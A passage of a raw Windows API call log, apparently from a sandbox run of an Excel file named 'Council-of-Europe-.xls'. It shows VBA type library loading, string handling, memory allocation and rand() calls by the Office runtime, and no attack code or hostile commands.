_Destination=0x1cf230, _SizeInWords=0x108, _Source="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library") returned 0x0 [0155.296] CharLowerBuffW (in: lpsz="*\\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE#Microsoft Excel 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020813-0000-0000-c000-000000000046}#1.9#0#c:\\program files\\microsoft office\\root\\office16\\excel.exe#microsoft excel 16.0 object library") returned 0x8d [0155.296] IMalloc:Alloc (This=0x7fefecb5380, cb=0x11c) returned 0x9806000 [0155.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020813-0000-0000-c000-000000000046}#1.9#0#c:\\program files\\microsoft office\\root\\office16\\excel.exe#microsoft excel 16.0 object library", cchWideChar=142, lpMultiByteStr=0x9806000, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020813-0000-0000-c000-000000000046}#1.9#0#c:\\program files\\microsoft office\\root\\office16\\excel.exe#microsoft excel 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0155.296] IMalloc:Free (This=0x7fefecb5380, pv=0x9806000) [0155.296] wcsncpy_s (in: _Destination=0x1cf1f0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.296] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf120, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.296] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.296] IUnknown:AddRef (This=0x9ab4b50) returned 0x2 [0155.296] IUnknown:QueryInterface (in: This=0x9ab4b50, riid=0x7fee51c85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf618 | out: ppvObject=0x1cf618*=0x0) returned 0x80004002 [0155.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Excel", cchWideChar=6, lpMultiByteStr=0x1cf5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Excel", lpUsedDefaultChar=0x0) returned 6 [0155.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Excel") returned 0x102b80 [0155.297] IUnknown:Release (This=0x9ab4b50) returned 0x1 [0155.297] GetModuleFileNameW (in: hModule=0x7fee4e20000, lpFilename=0x7fee51fe4c0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0155.297] QueryPathOfRegTypeLib (in: guid=0x7fee51cdd50*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, lpbstrPathName=0x1cf680 | out: lpbstrPathName=0x1cf680) returned 0x0 [0155.302] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x1cf6d8*=0x0 | out: pptlib=0x1cf6d8*=0x9ab5f00) returned 0x0 [0155.316] IUnknown:AddRef (This=0x9ab5f00) returned 0x2 [0155.316] ITypeLib:RemoteGetDocumentation (in: This=0x9ab5f00, index=-1, refPtrFlags=0x1cf6f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x31e9d0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x31e9d0*="1") returned 0x0 [0155.316] IUnknown:QueryInterface (in: This=0x9ab5f00, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf4e8 | out: ppvObject=0x1cf4e8*=0x0) returned 0x80004002 [0155.316] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1cf4e0, pDummy=0x10 | out: ppTLibAttr=0x1cf4e0, pDummy=0x10) returned 0x0 [0155.316] ITypeLib:RemoteGetDocumentation (in: This=0x9ab5f00, index=-1, refPtrFlags=0x0, pbstrName=0x1cf4d8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xde3c401549c | out: pbstrName=0x1cf4d8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xde3c401549c) returned 0x0 [0155.316] StringFromGUID2 (in: rguid=0x523c3b0*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1cf500, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0155.316] _ultow_s (in: _Value=0x4, _Buffer=0x1cf44a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0155.316] _ultow_s (in: _Value=0x2, _Buffer=0x1cf44e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0155.316] _ultow_s (in: _Value=0x9, _Buffer=0x1cf452, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0155.316] wcscpy_s (in: _Destination=0x7f554e8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0155.316] wcscpy_s (in: _Destination=0x7f554ee, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0155.316] wcscpy_s (in: _Destination=0x7f5553a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0155.316] wcscpy_s (in: _Destination=0x7f55548, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0155.316] wcscpy_s (in: _Destination=0x7f555ce, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0155.316] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0155.317] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9a6e910, cb=0x340) returned 0x9c62140 [0155.317] wcscpy_s (in: _Destination=0x9c62288, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0155.317] ITypeLib:RemoteGetDocumentation (in: This=0x9ab5f00, index=-1, refPtrFlags=0x1cf5f8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0155.317] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0155.317] strcpy_s (in: _Dst=0x1cf3f0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0155.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1cf3f0, cbMultiByte=4, lpWideCharStr=0x1cf240, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0155.317] IUnknown:AddRef (This=0x9ab4b50) returned 0x2 [0155.317] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x1cf310, pBstrLibName=0x1cf240 | out: pfName=0x1cf310*=0, pBstrLibName=0x1cf240) returned 0x0 [0155.327] IUnknown:Release (This=0x9ab4b50) returned 0x1 [0155.327] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc) returned 0x7aa0130 [0155.327] IMalloc:Free (This=0x7fefecb5380, pv=0x787f1c0) [0155.327] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x787f1c0 [0155.327] IMalloc:Free (This=0x7fefecb5380, pv=0x7aa0130) [0155.328] wcsncpy_s (in: _Destination=0x1cf1f0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0155.328] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0155.328] IMalloc:Alloc (This=0x7fefecb5380, cb=0x122) returned 0x9806000 [0155.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x9806000, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0155.328] IMalloc:Free (This=0x7fefecb5380, pv=0x9806000) [0155.328] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9b2fbb0, cb=0x440) returned 0xa1295b0 [0155.328] wcscpy_s (in: _Destination=0xa1297a8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0155.328] wcsncpy_s (in: _Destination=0x1cf230, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0155.328] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0155.328] IMalloc:Alloc (This=0x7fefecb5380, cb=0x122) returned 0x9806000 [0155.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x9806000, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0155.328] IMalloc:Free (This=0x7fefecb5380, pv=0x9806000) [0155.328] wcsncpy_s (in: _Destination=0x1cf1f0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.328] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf120, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.328] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.328] IUnknown:AddRef (This=0x9ab5f00) returned 0x3 [0155.328] IUnknown:QueryInterface (in: This=0x9ab5f00, riid=0x7fee51c85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf618 | out: ppvObject=0x1cf618*=0x0) returned 0x80004002 [0155.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x1cf5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0155.329] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0155.329] IUnknown:Release (This=0x9ab5f00) returned 0x2 [0155.329] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066550 [0155.329] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa066550) returned 0x0 [0155.329] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066560 [0155.329] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa066560) returned 0x0 [0155.331] VirtualQuery (in: lpAddress=0x1cfbc0, lpBuffer=0x1cfb80, dwLength=0x30 | out: lpBuffer=0x1cfb80*(BaseAddress=0x1cf000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x21000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0155.331] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066570 [0155.331] qsort (in: _Base=0xa066570, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee4f75594 | out: _Base=0xa066570) [0155.333] IMalloc:Free (This=0x7fefecb5380, pv=0xa066570) [0155.333] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x7aa0130 [0155.333] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc) returned 0x7aa0150 [0155.333] IMalloc:GetSize (This=0x7fefecb5380, pv=0x7aa0150) returned 0xc [0155.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0155.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0155.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0155.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0155.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0155.333] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0155.333] IMalloc:Free (This=0x7fefecb5380, pv=0xa066560) [0155.333] IMalloc:Free (This=0x7fefecb5380, pv=0xa066550) [0155.333] CoCreateGuid (in: pguid=0x1cfcc8 | out: pguid=0x1cfcc8*(Data1=0xe5ab7455, Data2=0xf25a, Data3=0x4793, Data4=([0]=0x8e, [1]=0x7a, [2]=0x8d, [3]=0xd3, [4]=0xce, [5]=0x2b, [6]=0x5a, [7]=0x55))) returned 0x0 [0155.333] IMalloc:Alloc (This=0x7fefecb5380, cb=0x6b0) returned 0xa129a00 [0155.334] srand (_Seed=0x5196) [0155.334] rand () returned 2707 [0155.334] rand () returned 5367 [0155.334] rand () returned 3107 [0155.335] rand () returned 25991 [0155.335] rand () returned 22224 [0155.335] rand () returned 7173 [0155.335] rand () returned 3305 [0155.335] rand () returned 5542 [0155.335] rand () returned 21093 [0155.335] rand () returned 7093 [0155.335] rand () returned 29645 [0155.335] rand () returned 30555 [0155.335] rand () returned 4452 [0155.335] rand () returned 15519 [0155.335] rand () returned 22682 [0155.335] rand () returned 20118 [0155.335] rand () returned 26125 [0155.335] rand () returned 28117 [0155.335] rand () returned 31912 [0155.335] rand () returned 27549 [0155.335] rand () returned 25247 [0155.335] rand () returned 12135 [0155.335] rand () returned 31572 [0155.335] rand () returned 27055 [0155.335] rand () returned 11630 [0155.335] rand () returned 26157 [0155.335] rand () returned 24237 [0155.335] rand () returned 16615 [0155.335] rand () returned 23350 [0155.335] rand () returned 7360 [0155.335] rand () returned 27760 [0155.335] rand () returned 12132 [0155.335] rand () returned 17327 [0155.335] rand () returned 21962 [0155.336] rand () returned 16183 [0155.336] rand () returned 15783 [0155.336] rand () returned 1121 [0155.336] rand () returned 21376 [0155.336] rand () returned 32749 [0155.336] rand () returned 25148 [0155.336] rand () returned 9658 [0155.336] rand () returned 30828 [0155.336] rand () returned 21381 [0155.336] rand () returned 2205 [0155.336] rand () returned 5726 [0155.336] rand () returned 9584 [0155.336] rand () returned 20715 [0155.336] rand () returned 32595 [0155.336] rand () returned 28862 [0155.336] rand () returned 14600 [0155.336] rand () returned 4923 [0155.337] rand () returned 4446 [0155.337] rand () returned 16108 [0155.337] rand () returned 5071 [0155.337] rand () returned 15410 [0155.337] rand () returned 20183 [0155.337] rand () returned 12462 [0155.337] rand () returned 17989 [0155.337] rand () returned 31458 [0155.337] rand () returned 18644 [0155.337] rand () returned 30673 [0155.337] rand () returned 19407 [0155.337] rand () returned 27305 [0155.337] rand () returned 17548 [0155.337] rand () returned 16063 [0155.337] rand () returned 30463 [0155.337] rand () returned 24163 [0155.337] rand () returned 10684 [0155.337] rand () returned 27988 [0155.337] rand () returned 29462 [0155.337] rand () returned 27615 [0155.337] rand () returned 12361 [0155.337] rand () returned 12270 [0155.337] rand () returned 32455 [0155.337] rand () returned 19344 [0155.337] rand () returned 4390 [0155.337] rand () returned 29891 [0155.337] rand () returned 17470 [0155.337] rand () returned 24709 [0155.337] rand () returned 15992 [0155.337] rand () returned 21368 [0155.337] rand () returned 29281 [0155.337] rand () returned 31899 [0155.338] rand () returned 26360 [0155.338] rand () returned 4847 [0155.338] rand () returned 31574 [0155.338] rand () returned 13554 [0155.338] rand () returned 18585 [0155.338] rand () returned 16736 [0155.338] rand () returned 7237 [0155.338] rand () returned 23197 [0155.338] rand () returned 5740 [0155.338] rand () returned 4779 [0155.338] rand () returned 4703 [0155.338] rand () returned 27550 [0155.338] rand () returned 30144 [0155.338] rand () returned 30956 [0155.338] rand () returned 8479 [0155.338] rand () returned 4113 [0155.338] rand () returned 22157 [0155.338] rand () returned 11088 [0155.338] rand () returned 19919 [0155.338] rand () returned 30631 [0155.338] rand () returned 11027 [0155.338] rand () returned 3880 [0155.338] rand () returned 29775 [0155.338] rand () returned 11094 [0155.338] rand () returned 17086 [0155.338] rand () returned 14140 [0155.338] rand () returned 6418 [0155.338] rand () returned 10063 [0155.338] rand () returned 19533 [0155.338] rand () returned 28002 [0155.338] rand () returned 7273 [0155.338] rand () returned 20785 [0155.339] rand () returned 17203 [0155.339] rand () returned 31311 [0155.339] rand () returned 13060 [0155.339] rand () returned 7804 [0155.339] rand () returned 19517 [0155.339] rand () returned 8108 [0155.339] rand () returned 18357 [0155.339] rand () returned 32584 [0155.339] rand () returned 17782 [0155.339] rand () returned 30829 [0155.339] rand () returned 10872 [0155.339] rand () returned 24887 [0155.339] rand () returned 3400 [0155.339] rand () returned 13150 [0155.339] rand () returned 12465 [0155.339] rand () returned 24232 [0155.339] rand () returned 17635 [0155.339] rand () returned 23550 [0155.339] rand () returned 10932 [0155.339] rand () returned 28205 [0155.339] rand () returned 4579 [0155.339] rand () returned 9617 [0155.339] rand () returned 21130 [0155.339] rand () returned 9792 [0155.339] rand () returned 9004 [0155.339] rand () returned 27761 [0155.339] rand () returned 6131 [0155.339] rand () returned 26929 [0155.339] rand () returned 32025 [0155.339] rand () returned 24997 [0155.339] rand () returned 28071 [0155.339] rand () returned 3427 [0155.340] rand () returned 20695 [0155.340] rand () returned 5300 [0155.340] rand () returned 31713 [0155.340] rand () returned 21944 [0155.340] rand () returned 25355 [0155.340] rand () returned 20411 [0155.340] rand () returned 23582 [0155.340] rand () returned 20042 [0155.340] rand () returned 17851 [0155.340] rand () returned 31166 [0155.340] rand () returned 16930 [0155.340] rand () returned 24924 [0155.340] rand () returned 26987 [0155.340] rand () returned 29500 [0155.340] rand () returned 13885 [0155.340] rand () returned 14480 [0155.340] rand () returned 18822 [0155.340] rand () returned 8454 [0155.340] rand () returned 17612 [0155.340] rand () returned 15962 [0155.340] rand () returned 14336 [0155.340] rand () returned 6481 [0155.340] rand () returned 18178 [0155.340] rand () returned 21428 [0155.340] rand () returned 3130 [0155.340] rand () returned 9993 [0155.341] rand () returned 10473 [0155.341] rand () returned 3603 [0155.341] rand () returned 14630 [0155.341] rand () returned 5992 [0155.341] rand () returned 20643 [0155.341] rand () returned 4506 [0155.341] rand () returned 3755 [0155.341] rand () returned 1480 [0155.341] rand () returned 2806 [0155.341] rand () returned 23438 [0155.341] rand () returned 10827 [0155.341] rand () returned 6581 [0155.341] rand () returned 8456 [0155.341] rand () returned 4363 [0155.341] rand () returned 23299 [0155.341] rand () returned 27463 [0155.341] rand () returned 31590 [0155.341] rand () returned 9717 [0155.341] rand () returned 31858 [0155.341] rand () returned 430 [0155.341] rand () returned 30283 [0155.341] rand () returned 28720 [0155.341] rand () returned 3390 [0155.341] rand () returned 8207 [0155.341] rand () returned 19232 [0155.341] rand () returned 31508 [0155.341] rand () returned 1204 [0155.341] rand () returned 21647 [0155.341] rand () returned 13119 [0155.341] rand () returned 12059 [0155.341] rand () returned 11182 [0155.341] rand () returned 32173 [0155.341] rand () returned 10236 [0155.342] rand () returned 8669 [0155.342] rand () returned 31930 [0155.342] rand () returned 14804 [0155.342] rand () returned 25574 [0155.342] rand () returned 8767 [0155.342] rand () returned 20344 [0155.342] rand () returned 30000 [0155.342] rand () returned 2378 [0155.342] rand () returned 21735 [0155.342] rand () returned 21316 [0155.342] rand () returned 2498 [0155.342] rand () returned 4601 [0155.342] rand () returned 29939 [0155.342] rand () returned 7445 [0155.342] rand () returned 9647 [0155.342] rand () returned 27723 [0155.342] rand () returned 3306 [0155.342] rand () returned 19621 [0155.342] rand () returned 27614 [0155.342] rand () returned 26980 [0155.342] rand () returned 15346 [0155.342] rand () returned 3283 [0155.342] rand () returned 705 [0155.342] rand () returned 24758 [0155.342] rand () returned 23364 [0155.342] rand () returned 29509 [0155.342] rand () returned 1395 [0155.342] rand () returned 11463 [0155.342] rand () returned 6110 [0155.342] rand () returned 849 [0155.342] rand () returned 2820 [0155.342] rand () returned 25909 [0155.342] rand () returned 21623 [0155.343] rand () returned 22558 [0155.343] rand () returned 14353 [0155.343] rand () returned 31223 [0155.343] rand () returned 26552 [0155.343] rand () returned 14854 [0155.343] rand () returned 3735 [0155.343] rand () returned 5093 [0155.343] rand () returned 2729 [0155.343] rand () returned 9023 [0155.343] rand () returned 28680 [0155.343] CoCreateGuid (in: pguid=0x9808a28 | out: pguid=0x9808a28*(Data1=0x204bfdb8, Data2=0x328d, Data3=0x4b5b, Data4=([0]=0xa2, [1]=0x47, [2]=0xfc, [3]=0x25, [4]=0x40, [5]=0xc4, [6]=0x46, [7]=0x5f))) returned 0x0 [0155.343] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x0) returned 0xa066550 [0155.343] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0x99defa0 [0155.343] strcpy_s (in: _Dst=0x9808a88, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0155.343] CExposedStream::Read () returned 0x0 [0155.343] IMalloc:Alloc (This=0x7fefecb5380, cb=0x2028) returned 0xa12a0c0 [0155.345] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10020*=0x10128) returned 0xa12c0f0 [0155.346] CExposedStream::AddRef () returned 0x2 [0155.346] CExposedStream::Release () returned 0x1 [0155.346] CExposedStream::Read () returned 0x0 [0155.346] CExposedStream::Read () returned 0x0 [0155.347] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0155.347] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1cfcc4, cbMultiByte=2, lpWideCharStr=0x1cfcd8, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0155.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBAProject", cchWideChar=11, lpMultiByteStr=0x1cfc50, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBAProject", lpUsedDefaultChar=0x0) returned 11 [0155.348] lstrcmpiA (lpString1="", lpString2="VBAProject") returned -1 [0155.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBAProject", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0155.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBAProject", cchWideChar=-1, lpMultiByteStr=0x1cfb50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBAProject", lpUsedDefaultChar=0x0) returned 11 [0155.348] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBAProject") returned 0x10bfbe [0155.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBAProject", cchWideChar=11, lpMultiByteStr=0x1cfa60, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBAProject", lpUsedDefaultChar=0x0) returned 11 [0155.348] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBAProject") returned 0x10bfbe [0155.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBAProject", cchWideChar=11, lpMultiByteStr=0x1cfa60, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBAProject", lpUsedDefaultChar=0x0) returned 11 [0155.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBAProject", cchWideChar=11, lpMultiByteStr=0x1cf920, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBAProject", lpUsedDefaultChar=0x0) returned 11 [0155.348] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBAProject") returned 